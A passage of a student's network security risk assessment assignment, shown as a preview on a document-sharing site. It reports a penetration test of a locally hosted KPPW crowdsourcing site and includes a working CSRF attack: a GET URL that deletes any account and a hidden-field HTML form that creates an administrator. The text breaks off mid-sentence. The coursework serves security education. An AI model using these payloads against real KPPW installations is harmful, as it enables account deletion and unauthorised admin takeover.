- 1、本文档共21页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
南阳理工学院
网络安全风险评估大作业
班 级: 13级网安四班
姓 名: 彭克杰
学 号: 1315935027
指导老师: 林玉香
2016.5.18
网络安全评估目的:网络平台安全泛指操作系统和通用基础服务安全,主要用于防范黑客攻击手段。目前市场上大多数安全产品均具有局限安全性,我们可以通用信息安全评估准则为依据来对其进行评估,来发现问题,修复问题,确定网络平台安全实施。
安全弱点和信息资产紧密相连,它可能被威胁利用、引起资产损失或伤害。但是,安全弱点本身不会造成损失,它只是一种条件或环境、可能导致被威胁利用而造成资产损失。安全弱点的出现有各种原因,例如可能是软件开发过程中的质量问题,也可能是系统管理员配置方面的,也可能是管理方面的。但是,它们的共同特性就是给攻击者提供了对主机系统或者其他信息系统攻击的机会。
因此,我们对网络产品,网络平台等进行一系列的风险评估很是必要,下面我们就对一个具体的网站进行安全方面的漏洞评估。
评估内容:
在本次实验中我们借助phpstudy搭建一个威客系统网站,进行实际渗透测试和评估。
扫描工具:Burpsuite,Nikto,WebScarab,扫描工具有很多,选个合适的就行。
这是发现的一些漏洞:
1.删除任意帐号/添加管理员
详细说明:
http://localhost/KPPW/index.php?do=userview=messageop=send
http://localhost/KPPW/index.php?do=pubtaskid=1step=step2
收件人填目标用户名 ,标题没有特定要求,内容没有转义,不过过滤了敏感标签和 onerror onload等事件。
任意删除账号:
http://localhost/KPPW/admin/index.php?do=userview=listop=deledituid=5529
GET提交此URL 就会删除ID为 “5529”的用户
edituid=fds[username]=qianlanfds[truename]=fds[phone]=fds[qq]=fds[indus_pid]=fds[indus_id]=fds[birthday]=fds[password]=111111fds[email]=x@q.cfds[group_id]=1is_submit=1
然后构造一个表单:
Code区域:
form action=http://localhost/KPPW/admin/index.php?do=userview=addedituid=
method=post
input type=hidden name=edituid value=
input type=hidden name=fds[username] value=qianlan
input type=hidden name=fds[truename] value=
input type=hidden name=fds[phone] value=
input type=hidden name=fds[qq] value=
input type=hidden name=fds[indus_pid] value=
input type=hidden name=fds[indus_id] value=
input type=hidden name=fds[birthday] value=
input type=hidden name=fds[password] value=123456
input type=hidden name=fds[email] value=x@q.c
input type=hidden name=fds[group_id] value=1
input type=submit name=is_submit value=1
/form
其他比较敏感的都隐藏起来。 因为script 标签被过滤。 不能自动提交。
所以放出来个按钮,发给人家一
文档评论(0)